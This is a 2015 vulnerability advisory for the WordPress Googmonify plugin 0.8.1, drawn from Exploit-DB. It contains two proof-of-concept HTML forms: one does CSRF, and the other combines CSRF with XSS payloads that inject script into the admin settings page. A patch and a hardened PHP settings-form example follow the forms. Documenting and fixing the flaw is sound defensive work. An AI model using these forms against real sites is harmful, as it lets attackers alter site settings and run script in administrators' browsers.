Vendor: Googmonify Plugin
By: Ehsan Hosseini
CVSS: 8.8 (HIGH)
Vulnerability: Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)
CWE: 79
Product Name: Googmonify Plugin
Affected Version From: 0.8.1
Affected Version To: 0.8.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:googmonify
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows FireFox
Year: 2015

WordPress Googmonify Plug-in XSS/CSRF

WordPress Googmonify Plugin version 0.8.1 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). The vulnerability exists due to insufficient sanitization of user-supplied input in the 'PID', 'Limit' and 'AID' parameters of the 'googmonify.php' script. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application and execute it in the browser of an unsuspecting user in the context of the vulnerable website.

Mitigation:

The vulnerability can be mitigated by sanitizing user-supplied input in the 'PID', 'Limit' and 'AID' parameters of the 'googmonify.php' script.

Exploit-DB raw data:

[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF
[+] Exploit Author : Ehsan Hosseini
[+] Date: 2015-08-21
[+] Vendor Homepage : https://wordpress.org/plugins/googmonify/
[+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip
[+] Version : 0.8.1
[+] Tested On : Windows FireFox
[+] CVE : N/A

===============================
Vulnerable Code : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo $pid; ?>">
<input id="Limit" name="Limit" type="text" value="<?php echo $limit; ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo $aid; ?>">
===============================
Exploit 1 (Just CSRF):

<form method="POST" action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='Ehsan Hosseini'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value="Ehsan Hosseini">
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>

Exploit 2 (CSRF & XSS):

<form method="POST" action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='"><script>alert(document.cookie)</script>'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value='"><script>alert(/Ehsan Hosseini/)</script>'>
<input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
</form>
===============================
Patch :  googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo htmlspecialchars($pid); ?>">
<input id="Limit" name="Limit" type="text" value="<?php echo htmlspecialchars($limit); ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo htmlspecialchars($aid); ?>">

===============================
Discovered By : Ehsan Hosseini.
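The patch quoted above only escapes the three values on output, which closes the XSS but leaves the CSRF side untouched. The following is an added example (not the plugin's own code, and not the advisory author's) of how a WordPress settings form for the same PID, Limit and AID fields would address both: a nonce and capability check on the POST handler, sanitization on input, and esc_attr() on output. The example_ function names, option keys and the nonce action name are assumptions chosen for illustration.

```php
<?php
// Added example, not Googmonify's own code. Function names, option keys and
// the nonce action 'example_googmonify_update' are assumptions.

// Runs before the settings page renders. The nonce and capability checks are
// what stop a form planted on another site from changing the options: the
// attacker's page cannot know the current nonce value, and a visitor without
// manage_options is refused even if they are logged in.
function example_googmonify_handle_update() {
    if ( ! isset( $_POST['GoogmonifyUpdate'] ) ) {
        return;
    }
    // check_admin_referer() terminates the request unless the posted nonce
    // is valid for this action.
    check_admin_referer( 'example_googmonify_update' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Sanitize on input: plain text for the two IDs, non-negative integer for
    // the limit. This does not replace output escaping below; it limits what
    // can be stored in the first place.
    update_option( 'example_googmonify_pid',   sanitize_text_field( wp_unslash( $_POST['PID'] ?? '' ) ) );
    update_option( 'example_googmonify_limit', absint( $_POST['Limit'] ?? 0 ) );
    update_option( 'example_googmonify_aid',   sanitize_text_field( wp_unslash( $_POST['AID'] ?? '' ) ) );
}

function example_googmonify_render_form() {
    $pid   = get_option( 'example_googmonify_pid', '' );
    $limit = get_option( 'example_googmonify_limit', 0 );
    $aid   = get_option( 'example_googmonify_aid', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'example_googmonify_update' ); ?>
        <!-- esc_attr() encodes <, >, &, " and ', so a stored value such as
             "><script>... stays inside the attribute as inert text. -->
        <input id="PID" name="PID" type="text" value="<?php echo esc_attr( $pid ); ?>">
        <input id="Limit" name="Limit" type="text" size="5" value="<?php echo esc_attr( $limit ); ?>">
        <input id="AID" name="AID" type="text" value="<?php echo esc_attr( $aid ); ?>">
        <input name="GoogmonifyUpdate" type="submit" value="Update Options &raquo;">
    </form>
    <?php
}
```

In a plugin these two functions would be hooked to the options page's load and render callbacks respectively; esc_attr() is preferred over bare htmlspecialchars() here because it also encodes single quotes, which matters if an attribute is ever single-quoted.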